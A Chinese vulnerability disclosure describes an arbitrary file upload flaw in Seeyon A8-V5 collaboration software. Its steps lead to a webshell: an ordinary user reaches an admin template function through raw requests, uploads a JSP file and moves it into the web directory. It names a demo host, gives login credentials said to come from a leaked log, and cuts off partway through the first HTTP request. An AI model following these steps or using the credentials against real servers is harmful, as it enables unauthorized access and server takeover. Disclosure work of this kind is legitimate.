致远A8-V5协同管理软件普通用户任意文件上传(通杀V5)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 这几天一直在琢磨致远A8-V5,昨天发现几个小问题,今天进一步挖掘到任意文件上传漏洞。 ### 详细说明: 致远A8-V5协同管理软件允许普通用户调用本属于system·权限的功能【登陆页模板管理】,虽然不能利用浏览器直接访问该功能,提示权限不足,但是直接发送数据包即可成功。 致远A8-V5协同管理软件充分的考虑了上传文件所带来的危险,全系统都采用上传文件缓存到web目录以外,不能直接获取webshell。但利用【登陆页模板管理】处的文件缓存迁移到web目录功能即可获取webshell。 ### 漏洞证明: 演示地址: http://a8v51.seeyon.com/ 演示账户:scyd/123456,泄露的log中获取到的。 步骤: 1.利用合法会话获取模板的ID 2.突破限制上传jsp可执行文件 3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录 证明开始: 1.利用合法会话获取模板的ID request: ``` POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList Accept-Language: zh-cn Proxy-Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: a8v51.seeyon.com Content-Length: 74 DNT: 1...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息